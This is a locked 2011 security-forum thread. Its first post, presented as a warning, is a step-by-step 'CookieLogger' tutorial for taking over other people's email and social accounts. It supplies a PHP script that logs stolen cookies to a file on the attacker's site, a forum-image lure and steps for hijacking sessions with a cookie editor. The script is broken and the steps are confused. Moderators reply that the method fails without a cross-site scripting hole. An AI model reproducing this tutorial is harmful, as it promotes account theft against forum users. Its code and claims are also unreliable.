Advertising (This ad goes away for registered users. You can Login or Register)

Protect yourself from this CookieLogger hack!!! Dangerous!!

Discuss security issues on computers here.
Content that is judged "dangerous" might be removed without prior notice
Locked
DBZo07
Posts: 67
Joined: Wed Jan 05, 2011 5:23 am

Protect yourself from this CookieLogger hack!!! Dangerous!!

Post by DBZo07 » Thu Nov 10, 2011 8:01 am

I will show your how this works..

Warning: This is to show what can happen if you don't delete your cookie..Purpose of this thread is to get expert advice from Mods present in this forum..
Hack Any A/c id by Cookies Stealer Easily



Well one of the question which is asked most to me is," How to hack into an email account ",So today i am posting a new way to hack into an email account ,I am not posting this post to exite hackers but to make you aware of whats going around

Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
What is a CookieLogger?
A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today I am going to show How to make your own Cookie Logger


Step 1
First you have to create a file which can capture a person's cookie.So follow the following process.

Step 2
Now you have to change http://www.yoursite.com
to your your site, Remember one thing you should not upload the files into a directory.
Now open notepad and paste the script in it and save it as fun.gif

Step 3
Copy the Following Script into a Notepad File and Save the file as cookielogger.php:
[spoiler]$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
{
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary Server Error,Sorry for the inconvenience.”; fclose($handle); exit; } echo “Temporary Server Error,Sorry for the inconvenience.”; exit; ?>[/spoiler]


Step 4:


Create a new Notepad File and Save it as logfile.txt Upload this file to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
fun.gif ->http://www.yoursite.com/fun.gif
logfile.txt ->http://www.yoursite.com/logfile.txt (chmod 777)


If you don’t have any Website then you can use the following Website to get a Free Website which has php support :
http://www.ofees.net
http://www.ripway.com
http://www.t35.com


Step 5
Go to the victim forum and insert this code in the signature or a post :

Code: Select all

[url=http://www.yoursite.com%20/fun.gif][img]http://yoursite.com/%20fun.jpg[/img][/url]
So the person who click it will think it is fun.jpg but it redirects to fun.gif

Step 6
So if you click the image you will get a temporary error and you will find the cookie in the logfile.txt

step 7
And something like this will be stored in your "logfile.txt"
[spoiler]phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9[/spoiler]

Step 8
To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.
Now for this you will need a firefox addon named https://addons.mozilla.org/en-US/firefo ... it-cookies /Add and edit cookies
Advertising
Forum Rules

Respect all members, you may find heights of stupidness but respect them! :D
Avoid & Prevent Spam!!
Staff are always right, so don't argue!
Never Fight with ADMIN!!its your own bad time than!!
Be happy and enjoy this Forums!!

TiPi
Retired Mod
Posts: 740
Joined: Tue Sep 28, 2010 5:32 am
Contact:

Re: Protect yourself from this CookieLogger hack!!! Dangerou

Post by TiPi » Sun Nov 27, 2011 1:00 pm

Wait, you assume this'd work? 0.o
When the victim clicks the link, and the script executes, the cookies of yoursite.com will be logged.. AFAIK you can't just steal cookies using a link, since the website that executes the script can only see the cookies assigned to that website.
To steal cookies of a website, you'd have to find a XSS (cross site scripting) vulnerability to inject your code.

Also, I don't know whether this is the right forum to discuss that kind of stuff. I'll discuss this with my fellow moderators.
Advertising
Problems or questions? Feel free to contact me.
-My Blog-

wololo
Site Admin
Posts: 3617
Joined: Wed Oct 15, 2008 12:42 am
Location: Japan

Re: Protect yourself from this CookieLogger hack!!! Dangerou

Post by wololo » Sun Nov 27, 2011 1:22 pm

I don't know if I should laugh and keep this thread open, or laugh and close the topic.
Cookies are associated to a given website. you cannot read the cookies of Website X when you are on website Y. In order to achieve that, you'd need to find a cross site scripting vulnerability, either in the browser, or in the site you are targeting.

Plus, even assuming that, your example simply wouldn't do anything, because you mixed up the steps. I assume you where supposed to copy the script in the gif image at some point...

Locking, post in this section only when you know what you are talking about.
If you need US PSN Codes, this technique is what I recommend.

Looking for guest bloggers and news hunters here at wololo.net, PM me!

Locked

Return to “Security”